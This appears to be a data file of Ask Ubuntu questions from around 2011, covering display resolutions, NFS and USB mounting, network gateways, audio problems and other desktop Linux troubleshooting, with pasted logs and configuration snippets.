60938	pyqt apps cause window manager to crash - where 's the problem ?	i 've upgraded to ubuntu 11.10 and i have a strange problem . pyqt apps , like retext and the one below , cause window manager to go crazy . metacity crashes , compiz hangs , gnome shell / mutter displays a window with parts of my wallpaper inside . example script that causes the problem ( which draws a window with qtextedit and qtoolbar ) : import sys from pyqt4.qtcore import qt from pyqt4.qtgui import * app = qapplication ( sys.argv ) window = qmainwindow ( ) editbox = qtextedit ( window ) toolbar = qtoolbar ( window ) window.setcentralwidget ( editbox ) window.addtoolbar ( qt.toptoolbararea , toolbar ) window.show ( ) sys.exit ( app.exec_ ( ) ) i get these warnings in the output : ( python:3489 ) : gtk-critical ** : ia__gtk_widget_style_get : assertion `gtk_is_widget ( widget ) ' failed and qwidget : :setminimumsize : ( /qmainwindow ) the largest allowed size is ( 16777215,16777215 ) what can cause this problem ?
60939	how to get 1280x1024 with a benq t905 ?	problem : nvidia x-server settings offers me 1152x864 and 1360x768 , but not the value 1280x1024 in-between that i need . how can i get the proper resolution ( 1280x1024 ) on nvidia ion with ubuntu 11.04 ? background : i 've asked this question before , but using a different computer . now , i 'm on a new computer ( =new gpu ) and the troubles have reappeared . it 's evident by now that the root problem is that my monitor is not delivering proper edid information to the computer , but i do not want to buy a new monitor , so i 'm trying to find a software solution to make ubuntu send the correct output . i had a working solution on 10.04 but editing the /etc/x11/xorg.conf file in section `` monitor '' does n't seem to work now , though it did back on 9.04 . also , fiddling with 'xrandr ' used to work ( although badly and without acceleration , but does n't work at all on this version , and oli mentions that 'xrandr ' does n't work with the closed nvidia drivers anyway so that 's not where i should be looking . data : my monitor is an lcd panel : vendor is benq , model t905 , with 1280x1024 resolution at 60hz , connected via a normal vga cable . in the control panel 's `` additional hardware '' , it says that the `` nvidia accelerated graphics driver [ current version ] ( recommended ) '' is `` activated but not currently in use '' . there 's a button to remove it , but no button to put it `` in use '' . i 've edited xorg.conf as described in an earlier solution , but this does n't seem to change anything even after a reboot : section `` monitor '' identifier `` monitor0 '' vendorname `` benq '' modelname `` t905 '' horizsync 31.0 - 81.0 vertrefresh 56.0 - 76.0 endsection $ cvt 1280 1024 60 results in : 1280x1024 59.89 hz ( cvt 1.31m4 ) hsync : 63.67 khz ; pclk : 109.00 mhz modeline `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync the output of xrandr -q contains the error : xrandr : failed to get size of gamma for output default
60940	how do i install dtrace ?	googling suggests that dtrace is available on linux but i ca n't find instructions as how to install it . dtrace is a comprehensive dynamic tracing framework . it is designed to give operational insights that allow users to tune and troubleshoot applications and the os itself . special consideration has been taken to make it safe to use in a production environment . for example , there is minimal probe effect when tracing is underway , and no performance impact associated with any disabled probe ; this is important since there are tens of thousands of dtrace probes that can be enabled .
60942	i do n't want nautilus to show my nfs share as `` umountable '' when only root can umount it	/etc/fstab 192.168.0.14 : /media/hdd500 /mnt/sosonicoco nfs user , auto 0 0 192.168.0.14 : /media/hdd500/musique /home/nicoco/musique nfs user , auto 0 0 sosonicoco is seen by nautilus as a normal directory , but musique appears as a umountable device , even though i have an error message stating i need root privileges to umount it when i click its eject button . how can i avoid nautilus to list this musique mounted nfs directory here ? it also appears in unity launcher , which is even more annoying
60944	video editor to create professional appearance	i 've been very impressed with this screencast . is there a simple way to create a professional-looking screencast using open software on ubuntu ? i 'm mainly interested with good-looking transitions between images and videos .
60949	is there an ide with inbuilt browser and terminal ?	i 'm looking for an ide which helps me reduce my alt-tabbing . at any given time , i 've got a chromium session open ( for testing my application ) , a gedit/geany session for editing , and a dedicated terminal for git etc . i remember that there was something like this in visual studio and expression studio . i 've been through komodo editor , eclipse , bluefish , anjuta but it seems that none of them have an integrated browser . also i do not like the inbuilt terminal of geany ( can never seem to restart it after a misplaced ctrl+d . just to be clear , i do not want a html preview mode ( offered by bluefish for eg ) which allows me to preview my html . i need a full-fledged browser ( with js , dom support ) embedded in tabs . i would love if an editor offered these three things ( editor , terminal , and browser ) in a tabbed view . allowing multiple terminals is a big plus . is there such an ide available ?
60961	stress testing hardware	is there a piece of software i can install on my ubuntu installation ( 10.04 ) to stress test all the hardware on my computer ? i understand i can download a specific disto to do this , but i would prefer if i can simply download the software and use it on my current installation .
60962	why is mediatomb not compiled with javascript support ?	i 've been using mediatomb for a while and when i 've decided to present files and folders in a custom way , i figured out that mediatomb in ubuntu 11.4 ( server ) was not compiled with javascript . has anyone encountered this situation , and find a `` simple '' ( few steps ) solution ? note i tried to compile & repack mediatomb , but one of its dependency libjs is now libmozjs185 api & abi changed so i aborted . thanks in advance .
60964	installer crashed - removing extra packages	i am installing ubuntu 11.04 ( i386 ) alongside my windows 7 , during installation , i am getting an installer crashed message ( when it tries to removing extra packages ) , but i was able to login to desktop . how can i fix this problem ? below the steps that i followed : downloaded ubuntu desktop i386.iso burned to my usb stick rebooted system and started installation my system info : intel i3 processor 500 gb hdd also one gb graphics card syslog partman log
60965	ubuntu natty freezes	i installed ubuntu natty on my machine and sometimes it freezes even when i perform no operation . i have installed restricted drivers , but no luck . my system config intel dual core 3.0ghz 2gb ram nvidia geforce 9500gt 160gb hard drive log file http : //paste.ubuntu.com/686993/ kernel log http : //paste.ubuntu.com/687003/ kernel log 12-09 http : //paste.ubuntu.com/687628/ any pointers to solve my system from freezing ?
60966	can not boot from liveusb created with pendrivelinux	i was trying to create a liveusb with my sandisk cruzer on ubuntu with the startup disk creator program , then because of some reason it could not boot . i guess it was because i checked the format usb option when i created the disk . after some time i wanted to install ubuntu 11.04 through the usb , so i formatted the usb and used pendrivelinux to create the liveusb ( i was on windows at that time ) . but the problem is that now my usb wo n't boot .
60968	what extra packages are available on the dvd that are not on the cd ?	i read in the release notes that there is a new dvd release of ubuntu with extra packages not found on the cd : with 11.10 beta 1 , we 're introducing a revised smaller dvd based on community feedback over the last few cycles . this is in addition to the traditional cd which remains available . this new dvd has a more manageable size of 1.5g . the new dvd image is an extension of our current cd image to include all the language packs and some other useful applications , such as inkscape , gimp , pitivi , and a more complete libreoffice suite . all the packages that used to be on the dvd are still available from the archive . were can i find the complete list of changes between the dvd and cd ?
60976	auto mount remote ntfs drive on local system	i have an ntfs drive on pc-a that i would like automatically mounted on pc-b on startup or through a launcher so that i can access through nautilus etc.. pc-a and pc-b are both running natty narwhal . pc-a is running openssh-server with public private key authentication with a passphrase . i came accross sshfs , but i cant figure out how to go about setting it up with a remote ntfs drive or even if it is possible at all .
60977	server error everytime there is a php error	i keep getting http error 500 ( internal server error ) : an unexpected condition was encountered while the server was attempting to fulfil the request . whenever there is something wrong with my php code . i am using ubuntu 11.04 with apache2 and php installed .
60980	how to share a wired internet connection via wifi ?	can someone please help me with a complete step by step guide to share my internet connection ( which is through a usb modem by zte ) with my iphone 3g ?
60981	is there a ti-82 emulator ?	i have a blue ti-82 that does n't have a computer input , and there for i have to code every program by hand . and on all tests i have to clear the memory so i do n't have any programs installed ( i could cheat if i did n't ) . i really would like to play blockdude , i have n't played that game in 3 years . so my question is , is there a emulator of the ti-8x that lets me play blockdude ?
60988	total kernel freezing with asus m3n78 pro	i have a pc with main board asus m3n78 pro and an integrated nvidia graphic board . this pc has a big problem : it randomly ( i think in average 1 crash/hour ) fall in total freeze . there is no other hardware devices plugged in . this is not a kernel problem , i 've tried with several kernel version ( from 2.6.32 to 3.0 ) and ubuntu version but the problem is always the same . when the pc crash there is no way to unfreeze : no ssh access , no keyboard shortcuts , nothing . the only possibility is to hard-reboot the system . when the pc crash the screen become monochromatic . maybe the 3d acceleration worsen the situation . ( i 'm not totally sure of this ) i hope for a solution . thank you .
60990	problem with the primary display	i have connected my laptop running ubuntu 11.04 to an external monitor . since then , i am not able to use my primary display . primary display shows only a resolution of 640x480 at the moment . the external display is a 22 '' monitor supporting a resolution of 1368x768 . here is the part of xorg.conf section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` device '' identifier `` intel 945g `` driver `` intel '' option `` monitor-lvds '' `` monlvds '' option `` monitor-vga '' `` monvga '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` default screen '' device `` intel corporation 945g integrated graphics controller '' monitor `` monlvds '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1440x900 '' virtual 3040 1200 endsubsection endsection any idea how to get both the monitors running at full resolution ?
60991	is it bad to have a long list in my crontab ?	i 'm toying around with building an application to display messages on the screen on a desired intervals . i want to use cron to achieve that and i am considering my options . the most naive approach would be to print the commands directly into crontab . is that a bad idea ?
60993	does ubuntu support usb 1.0 ?	i have a 16 gb 1.0 usb stick in titanium with leather bound , which i happen to love . i know it works in vista ( of all things ) but in ubuntu 11.04 ( i also have gnome 3 , if that may affect , but am fairly certain i tried before ) it is not detected . i have also run sudo commands in the terminal to search for it and it does not show up , nor when i login as root . due to the slow speed i only use it for html/css/php and a backup of software setups in case i break something and need to get my setup back without an internet connection . toshiba satellite-pro l300 1f-j ( with upgraded ram ) . 3 usb 2.0 ports , 2 on the left , one on the right , all tested . $ sudo lsusb generates : bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 0011:7788 bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub $ dmesg appends : [ 79.868026 ] usb 2-3 : new high speed usb device using ehci_hcd and address 2 [ 80.150509 ] usbcore : registered new interface driver uas [ 80.174803 ] initializing usb mass storage driver ... [ 80.174934 ] scsi6 : usb-storage 2-3:1.0 [ 80.175941 ] usbcore : registered new interface driver usb-storage [ 80.175945 ] usb mass storage support registered . [ 81.184276 ] scsi 6:0:0:0 : direct-access generic flash disk 8.00 pq : 0 ansi : 2 [ 81.184790 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 [ 81.187989 ] sd 6:0:0:0 : [ sdb ] 32768000 512-byte logical blocks : ( 16.7 gb/15.6 gib ) [ 81.188829 ] sd 6:0:0:0 : [ sdb ] write protect is off [ 81.188834 ] sd 6:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 81.188836 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 81.191324 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 81.207084 ] sdb : [ 81.212388 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 81.212395 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk
60999	why are there no icons on the unity launcher ?	due to my graphics card being blacklisted , i had to `` force '' compiz and unity to run . after doing so the ubuntu classic environment works awesomely ( as my card supports it fully ) , and unity works very well too -- except that there are no icons on the launcher . i can still run things from it but there are no icons . how can i fix this ? [ i 'm using the nvidia experimental 3d driver and the 173 ( proprietary , i only installed it thinking it would fix the issue ) ] this is on a toshiba tecra m2 ( the old one : p )
61010	ca n't mount external laptop hdd on laptop	i 'm running a vanilla instance of 32bit ubuntu 11.04 installed on the k53e laptop . the machine is up to date . i have an external laptop hdd that i 'm accessing via the rocketfish rf-hd3025 . the drive is not found with fdisk -l or gparted . i see the following with dmesg : [ 2108.679866 ] usb 2-1.2 : new high speed usb device using ehci_hcd and address 8 [ 2108.828091 ] scsi11 : uas [ 2111.200568 ] scsi 11:0:0:0 : direct-access symwave toshiba mk1637gs 2c pq : 0 ansi : 4 [ 2118.194699 ] scsi 11:0:0:0 : uas_eh_abort_handler tag 0 [ 2118.194713 ] scsi 11:0:0:0 : uas_eh_device_reset_handler tag 0 [ 2118.194721 ] scsi 11:0:0:0 : uas_eh_target_reset_handler tag 0 [ 2118.194727 ] scsi 11:0:0:0 : uas_eh_bus_reset_handler tag 0 [ 2118.266857 ] usb 2-1.2 : reset high speed usb device using ehci_hcd and address 8 [ 2118.408428 ] scsi 11:0:0:0 : device offlined - not ready after error recovery [ 2118.408507 ] scsi 11:0:0:0 : rejecting i/o to offline device [ 2118.408528 ] scsi 11:0:0:0 : rejecting i/o to offline device [ 2118.410213 ] scsi 11:0:0:1 : enclosure symwave ses 2c pq : 0 ansi : 4 [ 2118.410448 ] scsi 11:0:0:2 : uas_sense_old : urb length 26 disagrees with iu sense data length 510 , using 18 bytes of sense data [ 2118.411282 ] sd 11:0:0:0 : attached scsi generic sg2 type 0 [ 2118.411512 ] ses 11:0:0:1 : attached enclosure device [ 2118.411673 ] ses 11:0:0:1 : attached scsi generic sg3 type 13 i loaded ubuntu 10.10 via flashdisk and it mounts the drives fine . i can also access the disk via windows 7 . seems to be just ubuntu 11 at the moment . any ideas on what i can do to get it mounted ? i 'm relatively new to troubleshooting ubuntu issues . update : i can see the device now via lsusb . here are the details . bus 002 device 003 : id 1ca1:18a9 device descriptor : blength 18 bdescriptortype 1 bcdusb 2.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x1ca1 idproduct 0x18a9 bcddevice 43.07 imanufacturer 1 iproduct 2 iserial 3 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 85 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 500ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk ( zip ) iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x84 ep 4 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x03 ep 3 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 1 bnumendpoints 4 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 98 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface class : 04 24 01 00 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface class : 04 24 02 00 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x84 ep 4 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface class : 04 24 03 00 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x05 ep 5 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface class : 04 24 04 00 update # 2 if i wait for a minute , i get these additional lines with dmesg : [ 3184.660662 ] sd 11:0:0:0 : uas_eh_abort_handler tag 0 [ 3184.660679 ] sd 11:0:0:0 : uas_eh_device_reset_handler tag 0 [ 3184.660687 ] sd 11:0:0:0 : uas_eh_target_reset_handler tag 0 [ 3184.660699 ] sd 11:0:0:0 : uas_eh_bus_reset_handler tag 0 [ 3184.732711 ] usb 2-1.2 : reset high speed usb device using ehci_hcd and address 7 [ 3184.874194 ] sd 11:0:0:0 : device offlined - not ready after error recovery [ 3184.874267 ] sd 11:0:0:0 : rejecting i/o to offline device [ 3184.874290 ] sd 11:0:0:0 : rejecting i/o to offline device [ 3184.874301 ] sd 11:0:0:0 : rejecting i/o to offline device [ 3184.874309 ] sd 11:0:0:0 : [ sdb ] read capacity failed [ 3184.874313 ] sd 11:0:0:0 : [ sdb ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 3184.874321 ] sd 11:0:0:0 : [ sdb ] sense not available . [ 3184.874330 ] sd 11:0:0:0 : rejecting i/o to offline device [ 3184.874338 ] sd 11:0:0:0 : [ sdb ] write protect is off [ 3184.874344 ] sd 11:0:0:0 : [ sdb ] mode sense : 00 00 00 00 [ 3184.874351 ] sd 11:0:0:0 : rejecting i/o to offline device [ 3184.874358 ] sd 11:0:0:0 : [ sdb ] asking for cache data failed [ 3184.874363 ] sd 11:0:0:0 : [ sdb ] assuming drive cache : write through [ 3184.874863 ] sd 11:0:0:0 : [ sdb ] attached scsi disk update # 3 i gave up on trying to get this working . i loaded up ubuntu 10.10 so i could get all the files . while there , i recorded what dmesg said when the drive successfully loaded . hope this helps someone . [ 142.777698 ] usb 2-1.2 : usb disconnect , address 3 [ 151.417332 ] usb 2-1.2 : new high speed usb device using ehci_hcd and address 5 [ 151.561647 ] scsi8 : usb-storage 2-1.2:1.0 [ 153.928689 ] scsi 8:0:0:0 : direct-access symwave toshiba mk1637gs 2c pq : 0 ansi : 4 [ 153.929984 ] sd 8:0:0:0 : attached scsi generic sg3 type 0 [ 153.930523 ] sd 8:0:0:0 : [ sdc ] 312576000 512-byte logical blocks : ( 160 gb/149 gib ) [ 153.931639 ] sd 8:0:0:0 : [ sdc ] write protect is off [ 153.931653 ] sd 8:0:0:0 : [ sdc ] mode sense : 67 00 10 08 [ 153.931660 ] sd 8:0:0:0 : [ sdc ] assuming drive cache : write through [ 153.935251 ] sd 8:0:0:0 : [ sdc ] assuming drive cache : write through [ 153.935263 ] sdc : sdc1 sdc2 < sdc5 sdc6 sdc7 sdc8 > [ 154.017342 ] sd 8:0:0:0 : [ sdc ] assuming drive cache : write through [ 154.017353 ] sd 8:0:0:0 : [ sdc ] attached scsi disk [ 155.238996 ] ext4-fs ( sdc7 ) : recovery complete [ 155.239455 ] ext4-fs ( sdc7 ) : mounted filesystem with ordered data mode . opts : ( null )
61018	how do i get ~/.xcompose to work on qt applications while using ibus ?	i 'm trying to use ~/.xcompose in qt programs like anki , but they do n't recognize my settings ( a + _ giving âş instead of ä , for example ) . most help guides online tell me to set qt_im_module to xim , but i also want to use ibus . is there a way i can get xcompose to work in qt programs and keep ibus ?
61019	remove shortcut key to increase volume slider	i keep making this mistake : adjust the volume using the icon on the task bar , then without clicking somewhere else , try to change desktops ( ctrl+alt+right ) , get 100 % volume blaring in my headphones . does anyone know how to remove the keyboard shortcut for this ? it 's not under system > preferences > keyboard shortcuts i 'm surprised i ca n't find anyone else complaining about this , my work mate also has the same problem .
61022	rotate monitor 2째 counterclockwise ?	ubuntu 's monitor preferences tool ( listed as monitors in the dash ) is able to orient the screen left , right , normal or upside down , but is there a tool that can rotate the screen just a little ? my crt 's screen is rotated perhaps 2° counterclockwise and i was wondering if this is something i can fix with software . this monitor ( a gvc mpr ii ) does n't appear to have user serviceable settings to fix the problem . i 'm using an ati radeon graphics card and the proprietary drivers , if that matters . i looked for a setting to adjust in ati catalyst control , without success . edit : i found a tiny adjustment knob on the bottom of the back of the monitor and was able to solve the problem .
61026	moving the /usr directory to a different partition	i am running 11.04 on my cr-48 notebook from google along side of chrome os . i have moved my home directory to a 64gb partition on my external drive . i have another partition on this drive . i wish to know how to move the /usr directory to the empty partition . how can i do this . here are some additional details on the system . empty partition /dev/sdb2 : label= '' ubuntuusr '' uuid= '' ba9d8f02-6f29-438e-a27c-20a5bafe2ec3 '' type= '' ext4 '' how do i do this ? any help would be appreciated .
61031	can i use my bluetooth headset as a microphone ?	i have a motorola s305 bluetooth headset which i use with my computer often for headphones . i 've been using them for a while and have been really pleased with the sound quality , form factor , and battery life . the only thing is that i have n't found a way to use them as a microphone yet . is there a way for me to use them for a microphone so that i can seamlessly use them for skype and other applications ?
61038	ubuntu with integrated video card	i 'm planning to buy a new notebook and among the winners are some with integrated video card . my question is how can i live on linux with integrated card ? i want to use it for mainly programming , photo editing , watching movies and usual office stuff , no games or 3d related stuff . i 'm sure i wo n't have any problem with these tasks . also i would like to use google earth which is more problematic . do you have experience with it ? any flickering ? i also would like to use some windows in virtualized environment ( virtualbox or vmware ) with usual apps ( no 3d or games related ) . will there any problem with them ? can i use compiz related desktop effects ?
61039	skype icon on unity multi-display	i have a problem with skype notification icon . it’s similar to this problem , but it’s really bad with multiple display , cause the icon is displayed in wrong place i can not see the it at all . is there some known workaround to solve it ?
61041	save changes to filesystem in ram , save to hdd on shutdown	this question is in continuation to this question . i download a lot of small files ( a few mbs ) which i delete after being done with them . so can i make it that all changes to be saved to my filesystem be made in the ram if it 's under certain size ? for example , if i set the limit to 128 mb , all files under that size will be saved to the ram , and only saved to the hdd before shutdown .
61045	green screen when using displaylink on a toshiba l630 14c laptop	i 've justed returned to my lovely ubuntu after some years of non-linux os . anyhow , i have a toshiba l630 14c laptop , ubuntu seemed to be recognizing must of the hardware , although i 'm using 2 external screens besides the laptop screen ( which i want to turn off ) . as the moment , the usb display adepter is recognized , he even gets green right away , though i ca n't insert him into the xorg.conf since the x crashes , the issue is that the screen , using the usb adapter does n't send his eeid and then x does n't know how to use it . i tried to override eeid and it still did n't work . since two of the screens are the same , i tried 'tricking ' it by copying the eeid file from the vga ( recognized ) screen to the usb connected one , it kinda worked since the other screen was recognized though the display was not good , he could n't refresh his self and you could see pixels when you move the mouse . at the moment i have the displaylink drivers installed , green screen , though he does n't sends the eeid what making the x not to start properly . any ideas guys ?
61050	managing files and sync scenarios	i am currently ripping my entire cd collection , thus generating large music files . my scenario is : rip music to add locally and to ipod use sound juicer pointed to music folder music folder is set up to sync with ubuntu one , rip music not intended for ipod send to custom destination which is set up to sync with ubuntu one finally , transfer files in music folder from rhythmbox to ipod . this scenario worked really well until i ran out of space on my laptop and had to transfer ripped files from the music folder and custom destination to an external hard drive . when removing files from these folders , they were also removed from ubuntu one . i re-added them and then stopped the automatic sync . i now add my ripped music to my ubuntu one folder on my laptop , but need to find a way to allow me to remove music from a folder which is set up to sync on my computer without removing them on ubuntu one . i 'm not sure if this makes sense , maybe i am coming at this from a wrong angle anyway .
61055	how can i boot my usb from grub	i am dual booting ubuntu 11.04 and windows 7 and i have a bootable usb flash drive . how can i configure grub so it will boot my flash drive ?
61058	why is ip messenger ( gnome 2 ) showing a error ?	i installed ip messenger ( gnome 2 ) from ubuntu software center but its not working . it 's always showing an error message . filename : ipmsg.c function : create_lock_file line:157 can not setup lock file : /tmp/g2ipmsg.lock errno : -11 ( resource temporarily unavailable )
61060	how not to enable bluetooth with hw-wireless switch ?	my laptop has hardware switch for enabling and disabling wireless adapters . this includes both bluetooth and wlan . i rarely use bluetooth and would like to keep it disabled ( soft blocked ) unless i manually enable it . is this possible ? rfkill list when hw-switch disabled : 1 : tpacpi_bluetooth_sw : bluetooth soft blocked : yes hard blocked : yes 2 : phy0 : wireless lan soft blocked : yes hard blocked : yes hw-switch enabled : 1 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no 7 : hci0 : bluetooth soft blocked : no hard blocked : no this is what i would like to have when hw-switch is enabled : 1 : tpacpi_bluetooth_sw : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no i have thinkpad x61s with ubuntu 11.04 .
61061	how to install billreminder 0.4.0 ?	i would like to try the program billreminder 0.4.0 . but i need a little help with installing it . there does n't seem to be a .deb package available in the software center or synaptic .
61063	how to share an internet connection over bluetooth from the pc to the phone	how to share an internet connection from the pc to a mobile device ( eg : nokia phones ) . i do n't have 3g or wifi enabled on my old nokia phones , only bluetooth .
61065	python wo n't run in terminal	in an attempt to get cairoplot to run correctly on my ubuntu 11.04 , i stupidly copied the cairoplot.py into my /usr/local/bin/python dir . when i realized that this was n't the way to go , i deleted the file , now running 'python ' in terminal just hangs , i have restarted the machine , any ideas ?
61071	how to create appmenu in using python3 and pyqt ?	i am looking for a way to create appmenu indicator using python3.2 and pyqt4 . please help me .
61080	how to copy file to all clients using puppet ?	how do i copy files to all clients using puppet ? i have setup a puppet server and clients and i have tested the connection which was working fine . i am not a puppet expert , i am just a beginner , and i just want to know how to copy files to all clients from the puppet server ? i also want to know how to delete files ?
61082	audio playback problem	i have this problem with all of my music player applications banshee , guayadeque and amarok -when i click the play button nothing happens , i.e . music doesnt start playing or the play button doesnt change to a pause button etc ... playback in all of the applications was fine yesterday . everything is setup as it should be in sound preferences and speaker tests work fine . ive been using linux/ubuntu on and off for a few years , but still consider myself a relative noob , so theres probably some vital info missing -let me know if there is ill update asap . sound card in use : creative technology sb live ! 24-bit external aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc889a analog [ alc889a analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc889a digital [ alc889a digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : external [ sb live ! 24-bit external ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 lsmod | grep snd snd_hda_codec_hdmi 27535 1 snd_hda_codec_realtek 255882 1 snd_usb_audio 91410 2 snd_hda_intel 28209 2 snd_hda_codec 90901 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_pcm 80042 4 snd_hda_codec_hdmi , snd_usb_audio , snd_hda_intel , snd_hda_codec snd_hwdep 13274 2 snd_usb_audio , snd_hda_codec snd_usbmidi_lib 24388 1 snd_usb_audio snd_seq_midi 13132 0 snd_seq_midi_event 14475 1 snd_seq_midi snd_rawmidi 25269 2 snd_usbmidi_lib , snd_seq_midi snd_seq 51291 2 snd_seq_midi , snd_seq_midi_event snd_timer 28659 2 snd_pcm , snd_seq snd_seq_device 14110 3 snd_seq_midi , snd_rawmidi , snd_seq snd 55295 20 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_usb_audio , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_usbmidi_lib , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 12600 1 snd snd_page_alloc 14073 2 snd_hda_intel , snd_pcm cat /proc/asound/version advanced linux sound architecture driver version 1.0.23. cat /proc/asound/cards 0 [ intel ] : hda-intel - hda intel hda intel at 0xe9300000 irq 48 1 [ external ] : usb-audio - sb live ! 24-bit external creative technology sb live ! 24-bit external at usb-0000:00:1a.1-1 , full speed 2 [ hdmi ] : hda-intel - hda ati hdmi hda ati hdmi at 0xe5010000 irq 49
61083	ubuntu ca n't configure proper gateway at boot	my ubuntu machine is connected to internet via wifi , and also connected to lan by ethernet cable . every time i log on , i have to run these 2 commands in order to set the proper gateway ( wlan0 in my case ) so that i can access internet . % sudo route del default % sudo route add default gw 192.168.3.1 to automate , i 've tried several things that i 've found on internet but did n't work so far . though ca n't remember all of them , one of them is this : ( in /etc/network/interfaces , add the followings and reboot ) up route del default up route add -net 192.168.3.0/24 gw 192.168.3.1 dev wlan0 the result of route command right after boot ( before running the operation shown above , 10.0 . * is lan ) shows that eth0 is still set default gw against my desire : destination gateway genmask flags metric ref use iface 10.0.193.0 * 255.255.255.0 u 1 0 0 eth0 192.168.3.0 * 255.255.255.0 u 2 0 0 wlan0 link-local * 255.255.0.0 u 1000 0 0 eth0 default 10.0.193.1 0.0.0.0 ug 0 0 0 eth0 i use ubuntu 11.04 has anyone got a direct solution ? update 10/22/11 ) since i might have changed many configurations , i do n't know only these changes are the ones that take effect , but here are my solution . now the computer allows both internet ( wlan0 ) and local ( eth0 ) on boot . ( as the chosen answer indicates ) check both `` ignore automatically obtained routes '' & `` use this connection only for resources on its network '' modify /etc/network/interfaces as follows : auto lo iface lo inet loopback up route del default up route add -net 192.168.1.0/24 gw 192.168.1.1 dev wlan0
61086	is there a terminal that behaves like a console from web browsers ?	is there such a terminal where i can edit the text like in usual text area , i.e . copy - ctrl+c , paste - ctrl+v and so on ? good example is console in chrome or in firefox . then i do n't need to remember all these shortcut keys .
61088	why is ubuntu sticking with plymouth despite the fact that it does n't work with proprietary drivers ?	i know the background , just want to know why such decision by canonical .
61091	advanced format alignment using parted	how do i align a western digital advanced format hard drive using minimal ( 4k ) alignment when installing ubuntu 11.04 ? should i do it before installing via the livecd ? if so , do i select to `` try ubuntu '' and then launch parted from the terminal ? according to http : //wdc.custhelp.com/app/answers/detail/a_id/5655/~/how-to-install-a-wd-advanced-format-drive-on-a-non-windows-operating-system it says to use : parted -a optimal /dev/sda . so do i just launch terminal from livecd and type sudo parted -a optimal /dev/sda and then install ubuntu normally ?
61093	issues when copying data to my ntfs external terabyte harddrive - natty 32bit	i 'm having issues every time i copy a large sum of files to my external harddrive from my actual harddrive - what happens is that it gets at a certain point in the copying stage then it freezes and my caps lock button blinks . i took a video to show exactly what happened : http : //www.youtube.com/watch ? v=zslxmyz5hq0 if the video isnt showing up right away , its still processing .
